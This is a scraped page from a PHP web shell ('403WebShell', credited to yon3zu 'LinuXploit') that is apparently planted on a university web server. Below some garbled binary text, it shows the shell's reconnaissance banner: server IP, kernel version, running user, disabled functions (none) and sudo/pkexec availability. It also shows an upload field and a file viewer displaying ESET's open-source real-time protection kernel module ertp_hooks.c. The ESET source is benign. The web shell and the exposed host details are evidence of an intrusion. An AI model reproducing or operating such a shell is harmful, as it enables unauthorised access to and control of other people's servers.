403WebShell

h( )($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms��Sb�,;R''6c2I�!\��kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K��x)1�6@r*2�89ma��&��'ti��{~#��t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1��w�r��l&-t*3�<<�u��#��j&.u��J68\8?"#$%&'()*+,-./0 !
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell403Webshell

Server IP : 10.254.12.21 / Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON | cURL : ON | WGET : OFF | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON
Directory : /var/opt/eset/efs/eventd/eset_rtp/

Upload File :

[ Back ]

Current File : /var/opt/eset/efs/eventd/eset_rtp/ertp_hooks.c

/*
 * eset_rtp (ESET Real-time file system protection module)
 * Copyright (C) 1992-2021 ESET, spol. s r.o.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 *
 * In case of any questions, you can contact us at ESET, spol. s r.o., Einsteinova 24, 851 01 Bratislava, Slovakia.
 */

#include "ertp.h"
#include "ertp_scan_mask.h"

#define SYS_CALL_TABLE "sys_call_table"
#define SYS_CALL_TABLE_32 "ia32_sys_call_table"

#if LINUX_VERSION_CODE < KERNEL_VERSION(5,8,0)
#define ertp_mm_lock(m) down_read(&(m)->mmap_sem)
#define ertp_mm_unlock(m) up_read(&(m)->mmap_sem)
#else
#define ertp_mm_lock(m) mmap_read_lock(m)
#define ertp_mm_unlock(m) mmap_read_unlock(m)
#endif

static inline bool ertp_file_empty(const struct path *path)
{
	struct kstat attr_info;
	if (ertp_vfs_getattr(path, &attr_info) < 0) {
		return false;
	}

	return attr_info.size == 0;
}

static int ertp_get_process_path(char **path, size_t path_size)
{
	// cppcheck-suppress variableScope; [pathname points inside tmp]
	char *pathname = NULL;
	char *tmp = NULL;
	int err = 0;
	struct mm_struct *mm = current->mm;

	if (unlikely(!mm)) {
		return -ENODATA;
	}

	tmp = (char *)kzalloc(PATH_MAX, GFP_KERNEL);
	if (unlikely(!tmp)) {
		return -ENOMEM;
	}

	ertp_mm_lock(mm);
	if (mm->exe_file) {
		pathname = d_path(&mm->exe_file->f_path, tmp, PATH_MAX);
	}
	ertp_mm_unlock(mm);

	if (IS_ERR(pathname)) {
		err = PTR_ERR(pathname);
		goto end;
	}

	if (unlikely(strlen(pathname) > path_size)) {
		err = -ENOMEM;
		goto end;
	}

	strcpy(*path, pathname);
end:
	kfree(tmp);
	return err;
}

static int ertp_should_check(const struct file *file, int type, const char *process_path)
{
	if (ertp_is_stopped())
		return 0;

	/* scanner process */
	if (ertp_is_scanner())
		return 0;

	/* current process is excluded */
	if (ertp_proc_excluded(process_path))
		return 0;

	/* inode doesn't exist */
	if (!file->f_dentry->d_inode)
		return 0;

	/* not a regular file */
	if(!S_ISREG(file->f_dentry->d_inode->i_mode))
		return 0;

	/* empty file */
	if (ertp_file_empty(&file->f_path))
		return 0;

	/* closing O_RDONLY file */
	if (type == ERTP_CLOSE && ((file->f_flags & O_ACCMODE) == O_RDONLY))
		return 0;

	/* file is excluded */
	if (ertp_file_excluded(file))
		return 0;

	return 1;
}

static inline enum ertp_flt_rv ertp_eval_res(int rv)
{
	switch(ERTP_WITHOUT_FLAGS(rv)) {
		case ERTP_DENY:
			return ERTP_DENIED;
		default:
			return ERTP_CONTINUE;
	}
}

static enum ertp_flt_rv ertp_check_file(const struct file *file, int type)
{
	int rv;
	char *process_path = (char *)kzalloc(PATH_MAX, GFP_KERNEL);
	if (unlikely(!process_path)) {
		return ERTP_DENIED;
	}

	if (unlikely(ertp_get_process_path(&process_path, PATH_MAX))) {
		rv = ERTP_DENY;
		goto end;
	}

	if (!ertp_should_check(file, type, process_path)) {
		rv = ERTP_CONTINUE;
		goto end;
	}

	rv = ertp_cache_check(file, type);
	switch (rv) {
		case ERTP_ALLOW:
		case ERTP_DENY:
			goto end;
		case ERTP_UNKNOWN:
			break;
		case ERTP_MODIFIED:
			type |= ERTP_MODIFIED; // add modified flag to request type
			break;
		case ERTP_SCAN_IN_PROGRESS:
			type |= ERTP_SCAN_IN_PROGRESS;
			break;
		default:
			ertp_pr_error("Not handled cache result %d", rv);
	}

	rv = ertp_process_request(file, type, process_path);
	process_path = NULL; // ownership was moved to ertp_process_request

end:
	kfree(process_path);
	return ertp_eval_res(rv);
}

enum ertp_flt_rv ertp_check_open(const struct file *file)
{
	return ertp_check_file(file, ERTP_OPEN);
}

enum ertp_flt_rv ertp_check_close(const struct file *file)
{
	return ertp_check_file(file, ERTP_CLOSE);
}

enum ertp_flt_rv ertp_check_exec(const struct file *file)
{
	return ertp_check_file(file, ERTP_EXEC);
}

int ertp_hooks_init(uintptr_t t32, uintptr_t t64)
{
	int rv;

/* try to find syscall tables dynamically, overriding provided values if found */
#if (LINUX_VERSION_CODE > KERNEL_VERSION(2,6,32))
	uintptr_t k32, k64 = ertp_lookup_address(SYS_CALL_TABLE);

	if (k64) {
		printk(KERN_DEBUG ESET_RTP ": found 64-bit syscall table at address %p\n", (void *)k64);
		t64 = k64;
	}

#ifdef CONFIG_IA32_EMULATION
	k32 = ertp_lookup_address(SYS_CALL_TABLE_32);

	if (k32) {
		printk(KERN_DEBUG ESET_RTP ": found 32-bit syscall table at address %p\n", (void *)k32);
		t32 = k32;
	}
#endif /* CONFIG_IA32_EMULATION */
#endif

	if (!t64) {
		ertp_pr_error("cannot find 64-bit syscall table");
		return -ENOENT;
	}

#ifdef CONFIG_IA32_EMULATION
	if (!t32) {
		ertp_pr_error("cannot find 32-bit syscall table");
		return -ENOENT;
	}
#endif /* CONFIG_IA32_EMULATION */

	if ((rv = ertp_handlers_init(t32, t64)) != 0) {
		return rv;
	}

	return 0;
}

void ertp_hooks_exit(void)
{
	ertp_handlers_deinit();
}

Youez - 2016 - github.com/yon3zu
LinuXploit